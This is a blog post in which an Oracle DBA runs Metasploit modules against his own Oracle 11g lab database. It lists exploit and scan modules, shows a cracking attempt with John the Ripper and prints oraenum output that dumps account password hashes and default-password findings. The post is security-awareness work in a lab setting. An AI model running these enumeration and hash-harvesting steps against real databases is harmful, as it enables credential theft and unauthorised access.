Exploiting an Oracle database with Metasploit (Part 1)

Now that I have a Metasploit and Oracle demo environment, it is time to see what I can use to exploit an Oracle 11g Release 2 database. I have to tell you, most of the exploits are actually rather old. I was a bit disappointing.

When you do “search oracle” in Metasploit, you get a promising, long list of scans and exploits. But as you’ll quickly note, a lot is Java related. Because that’s also Oracle. It helps to do a smarter search, for example by looking up oracle in the name: “search name:oracle”. But this also gives you MySQL exploits. And exploits of every old Oracle version. I’m not looking for that now either. And I’ve tried grepping, but that is not interpreted as grepping and gives you really weird results.

So in the end I’m just giving you my list of Oracle database scans and exploits that do not have old version numbers in the description. All non-database products are removed from the list. And for good measure, I’ve also removed exploits with very old disclosure dates, because I assumed they were targeted at versions much older than Oracle 11g.


Name                                                 Disclosure Date  Rank       Description
----                                                 ---------------  ----       -----------
auxiliary/admin/oracle/ora_ntlm_stealer              2009-04-07       normal     Oracle SMB Relay Code Execution
auxiliary/admin/oracle/oracle_login                  2008-11-20       normal     Oracle Account Discovery
auxiliary/admin/oracle/oracle_sql                    2007-12-07       normal     Oracle SQL Generic Query
auxiliary/admin/oracle/oraenum                                        normal     Oracle Database Enumeration
auxiliary/admin/oracle/post_exploitation/win32exec   2007-12-07       normal     Oracle Java execCommand (Win32)
auxiliary/admin/oracle/post_exploitation/win32upload 2005-02-10       normal     Oracle URL Download
auxiliary/admin/oracle/sid_brute                     2009-01-07       normal     Oracle TNS Listener SID Brute Forcer
auxiliary/admin/oracle/tnscmd                        2009-02-01       normal     Oracle TNS Listener Command Issuer
auxiliary/analyze/jtr_oracle_fast                                     normal     John the Ripper Oracle Password Cracker (Fast Mode)
auxiliary/scanner/oracle/emc_sid                                      normal     Oracle Enterprise Manager Control SID Discovery
auxiliary/scanner/oracle/oracle_hashdump                              normal     Oracle Password Hashdump
auxiliary/scanner/oracle/oracle_login                                 normal     Oracle RDBMS Login Utility
auxiliary/scanner/oracle/sid_brute                                    normal     Oracle TNS Listener SID Bruteforce
auxiliary/scanner/oracle/sid_enum                    2009-01-07       normal     Oracle TNS Listener SID Enumeration
auxiliary/scanner/oracle/tnslsnr_version             2009-01-07       normal     Oracle TNS Listener Service Version Query
auxiliary/scanner/oracle/tnspoison_checker           2012-04-18       normal     Oracle TNS Listener Checker
auxiliary/scanner/oracle/xdb_sid                                      normal     Oracle XML DB SID Discovery
auxiliary/scanner/oracle/xdb_sid_brute                                normal     Oracle XML DB SID Discovery via Brute Force
auxiliary/sqli/oracle/jvm_os_code_11g                2010-02-01       normal     Oracle DB 11g R1/R2 DBMS_JVM_EXP_PERMS OS Code Execution
exploit/windows/oracle/client_system_analyzer_upload 2011-01-18       excellent  Oracle Database Client System Analyzer Arbitrary File Upload

So that brings me to actually two exploits, and one is actually targetted at the database client (I left it in there, because where there are databases, there often are clients) and one SQL injection hack that – mind you – actually works. If you are a bit of a hacker (or “good with Internet”), it’s not so difficult to get a DBA role with it.  Still, bit sobering, isn’t it.

I went through the whole list of scans. Here are few of my experiences.

Password hashes and John the Ripper

I really wanted to try John the Ripper to hack Oracle hashes, but I just did not get it to work. John the Ripper is not running from Metasploit, but installed on Kali Linux 2: its executable is just “john”. And when running john, it assumes you have written a hashdump somewhere that it can use. No problem, there’s a page about John the Ripper hash formats. So I wrote this line in a text file:

DBSNMP:BA054BE9241074F8437B47B98B9298F6063561403341EA94F595D242183E

Should be compatible, right? Well, apparently not.

root@kali:~# john --format=oracle11 /tmp/orahash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (oracle11, Oracle 11g [SHA1 128/128 AVX 4x])
Illegal instruction

An Oracle 10g hash I wrote to a file got the same result. Okay, before I’ll file a bug report, I’ll better try to make a hash dump from my database. See if that will get better results. And maybe I can use that output.

So for that we have auxiliary/scanner/oracle/oracle_hashdump. To run it you need the IP or host of the database server, a SID, and if you’re going to use SCOTT for this, you really need to change the password to lowercase. Also, SCOTT can’t do this exploit by default. You need to give SCOTT the SELECT ANY DICTIONARY privilege. (And this is why you should NEVER give SELECT ANY DICTIONARY privileges: because it gives the user access to your password hashes for one thing.)

msf auxiliary(ora_ntlm_stealer) > use auxiliary/scanner/oracle/oracle_hashdump

The info command is usually more useful than “show options”. Here you see the info after I changed all required values.

msf auxiliary(oracle_hashdump) > info

Name: Oracle Password Hashdump
Module: auxiliary/scanner/oracle/oracle_hashdump
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
theLightCosine <theLightCosine@metasploit.com>

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
DBPASS   tiger            yes       The password to authenticate with.
DBUSER   SCOTT            yes       The username to authenticate with.
RHOSTS   192.168.56.163   yes       The target address range or CIDR identifier
RPORT    1521             yes       The TNS port.
SID      KNUTSEL          yes       The sid to authenticate with.
THREADS  1                yes       The number of concurrent threads

Description:
This module dumps the usernames and password hashes from Oracle
given the proper Credentials and SID. These are then stored as creds
for later cracking.

I ran it and..:

msf auxiliary(oracle_hashdump) > run

[*] Server is running 11g, using newer methods...
[-] An error occured. The supplied credentials may not have proper privs
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Here is where I got that Han Solo hyperdrive failure feeling. The supported credentials may not have the proper privs? Well if I remove SELECT ANY DICTIONARY I get ORA-00942. That’s what you expect when not having the proper privs:

msf auxiliary(oracle_hashdump) > run

[*] Server is running 11g, using newer methods...
[*] ORA-00942: table or view does not exist
[-] An error occured. The supplied credentials may not have proper privs
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So I tried to give SCOTT direct select privs on USER$ from SYS. Nope, error. I ran it as SYSTEM. Nope, error. I ran it as SYS… well, actually that wouldn’t work. You have to log in AS SYSDBA, see. So, yeah, this clearly needs a fix. The source code is out there. I’ll see if can find the bug.

 

auxiliary/admin/oracle/oraenum

Before you throw the Metasploit towel in the ring, let’s have one that I thought was really interesting: auxiliary/admin/oracle/oraenum by Carlos Perez. You need to give a host IP or name, a SID and – again – if you’re going to use SCOTT for this, you really need to change the password to lowercase. Of course SCOTT needs a couple of extra privileges. SELECT ANY DICTIONARY did the trick nicely (so – again – let that be a warning, rather than an encouragement).

msf auxiliary(oraenum) > info

Name: Oracle Database Enumeration
Module: auxiliary/admin/oracle/oraenum
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
Carlos Perez <carlos_perez@darkoperator.com>

Basic options:
Name    Current Setting  Required  Description
----    ---------------  --------  -----------
DBPASS  TIGER            yes       The password to authenticate with.
DBUSER  SCOTT            yes       The username to authenticate with.
RHOST                    yes       The Oracle host.
RPORT   1521             yes       The TNS port.
SID     ORCL             yes       The sid to authenticate with.

Description:
This module provides a simple way to scan an Oracle database server
for configuration parameters that may be useful during a penetration
test. Valid database credentials must be provided for this module to
run.

msf auxiliary(oraenum) > set RHOST 192.168.56.163
RHOST => 192.168.56.163
msf auxiliary(oraenum) > set SID KNUTSEL
SID => KNUTSEL
msf auxiliary(oraenum) > set dbpass tiger
dbpass => tiger
msf auxiliary(oraenum) > run

[*] Running Oracle Enumeration....
[*] The versions of the Components are:
[*]      Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production
[*]      PL/SQL Release 11.2.0.1.0 - Production
[*]      CORE     11.2.0.1.0     Production
[*]      TNS for Linux: Version 11.2.0.1.0 - Production
[*]      NLSRTL Version 11.2.0.1.0 - Production
[*] Auditing:
[*]      Database Auditing is enabled!
[*]      Auditing of SYS Operations is not enabled!
[*] Security Settings:
[*]      SQL92 Security restriction on SELECT is not Enabled
[*]      UTL Directory Access is set to
[*]      Audit log is saved at /u01/app/oracle/admin/KNUTSEL/adump
[*] Password Policy:
[*]      Current Account Lockout Time is set to 1
[*]      The Number of Failed Logins before an account is locked is set to 10
[*]      The Password Grace Time is set to 7
[*]      The Lifetime of Passwords is set to 180
[*]      The Number of Times a Password can be reused is set to UNLIMITED
[*]      The Maximum Number of Times a Password needs to be changed before it can be reused is set to UNLIMITED
[*]      The Number of Times a Password can be reused is set to UNLIMITED
[*]      Password Complexity is not checked
[*] Active Accounts on the System in format Username,Password,Spare4 are:
[*]      SYS,03E1E7984F880583,S:3CD57915E74AF162A5ABA3A30FE453E43DF884CB6A552C647B03572BA46D
[*]      SYSTEM,5A7270D7D12F6BA6,S:EDCB23E4039293C352B12D01EA52F2AF3311B5FA744BE3DCC728BDFE0655
[*]      DBSNMP,57E9C5ECCAB1777C,S:D9576CA642448980FB5C04D3869614D572E712BF5E019E02C31BBF300E76
[*]      SYSMAN,CB3E68076FBBAFF5,S:1132C132BFA6686735DEC4398F30DD411F0DDCAAAFCB4AC21527887B7129
[*]      MGMT_VIEW,23C5225CD5C2C782,S:0983A18B9809980B2ABE7A7A4047E5AA3925DC184C92047B6F5404E8CD11
[*]      APP_USER,71B0EFF101D0D5AC,S:13BAA4B46E85969429B3242E64E526292EB15BA071E3AAF37649CD3289BA
[*]      SCOTT,F894844C34402B67,S:7ED8346E4DA9EE29ACBB4A9D08B2E18B57404E6A9A03DB6AF01024BC0B8F
[*] Expired or Locked Accounts on the System in format Username,Password,Spare4 are:
[*]      OUTLN,4A3BA55E08595C81,S:8DF2965A946AB7ED6F6657A99B91CC792B67BF873D7CAFD3B20C98A28370
[*]      DIP,CE4A36B8E06CA59C,S:3E265D395D4D1A637729747CECC8BAD1CD8EFA262A8377E5635BB94434C5
[*]      ORACLE_OCM,5A2E026A9157958C,S:CDC4C09C00C4A8C25DCD1062BF8EC8BCB468841A1C77AB6E65188DF24D99
[*]      APPQOSSYS,519D632B7EE7F63A,S:B388B593D8609871990A15E991C82ACA154B0ADDA84E7CB549CFCC6E9B94
[*]      WMSYS,7C9BA362F8314299,S:A38520037B1C3904B76B3B65E8605DA4F89F710345F60FC7406A3FE9B709
[*]      XS$NULL,DC4FCC8CB69A6733,S:0327C110E72AE2E82F08AACBBBD385E4589FA1386F20119E1EE2A6AC8DC4
[*]      EXFSYS,33C758A8E388DEE5,S:BA1BB1B61AA7FE91BFF3CA99A116C2299F2DA8F87398D5560C20B74EDD00
[*]      XDB,88D8364765FCE6AF,S:7E885EEAC286739730FEDD138F83A361204D96FB92E35FFBDD89A494E32B
[*]      ANONYMOUS,anonymous,
[*]      APEX_PUBLIC_USER,E0781A84AA9234A8,S:934C76C08882384A2C51644F9C8302D40D32BFB83524BC4EC9EB84CA0221
[*]      ORDSYS,7EFA02EC7EA6B86F,S:74C72073718541C8074E24B1210367A6D702C01064580BFF4E5719AD8ECD
[*]      ORDDATA,A93EC937FCD1DC2A,S:C7267CE01C7CDCD0AF39C4289B7C66A3E0E75EAA3DC47D6143984256A9F1
[*]      ORDPLUGINS,88A2B2C183431F00,S:554026F9CFABC573E6A7B439716F69AF45A33D969FE7C16AA2E8CF702E34
[*]      SI_INFORMTN_SCHEMA,84B8CBCA4D477FA3,S:1C2A0B249085C3CEED0B29019231E49F35A56CDB8E0653B1E38E39B5AB8E
[*]      MDSYS,72979A94BAD2AF80,S:FE9431C8FA6CD61C1741389012B7D7B9ABD4213A612286E83E45F3E50A9E
[*]      FLOWS_FILES,110F19A4A024EB24,S:EB5CC126B7E3198814CC1B06065AF0E15259706E4036431D15F809527816
[*]      APEX_030200,A1A70E91605C5567,S:36A4A6B16BC8D55287D3E672FD86D72EA63C3749640A9DD668122E702F1E
[*] Accounts with DBA Privilege  in format Username,Hash on the System are:
[*]      SYS
[*]      APP_USER
[*]      SYSTEM
[*] Accounts with Alter System Privilege on the System are:
[*]      SYS
[*]      DBA
[*]      APEX_030200
[*] Accounts with JAVA ADMIN Privilege on the System are:
[*] Accounts that have CREATE LIBRARY Privilege on the System are:
[*]      SYS
[*]      XDB
[*]      EXFSYS
[*]      MDSYS
[*]      DBA
[*] Default password check:
[*]      The account DIP has a default password.
[*]      The account MDSYS has a default password.
[*]      The account XS$NULL has a default password.
[*]      The account OUTLN has a default password.
[*]      The account EXFSYS has a default password.
[*]      The account ORACLE_OCM has a default password.
[*]      The account SCOTT has a default password.
[*]      The account ORDPLUGINS has a default password.
[*]      The account ORDSYS has a default password.
[*]      The account APPQOSSYS has a default password.
[*]      The account ORDDATA has a default password.
[*]      The account XDB has a default password.
[*]      The account SI_INFORMTN_SCHEMA has a default password.
[*]      The account WMSYS has a default password.
[*] Auxiliary module execution completed

Well, that was pretty cool. Password hashes anyone? Default password checks? Checks on auditing. Very nifty.

Next blogpost: TNS poisoning and brute force SID enumerations.

Advertisements

About Marcel-Jan Krijgsman

Ever since I started working with Oracle, I had an interest in Oracle database performance tuning. This led, eventually, to a four day training I made and gave for customers of Transfer Solutions. Since 2012 I work for Rabobank Nederland. A few years ago I also became interested in Oracle database security. All technology aside, it is my experience that security usually plays out on a political level. I'm a Oracle certified professional for the 8i, 9i, 10g and 11g databases and Oracle Database 11g Performance Tuning Certified Expert.
This entry was posted in Hacking for better security awareness, Oracle security and tagged , , , , . Bookmark the permalink.

One Response to Exploiting an Oracle database with Metasploit (Part 1)

  1. Pingback: Exploiting an Oracle database with Metasploit (Part 2) | Marcel-Jan's Oracle Blog

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s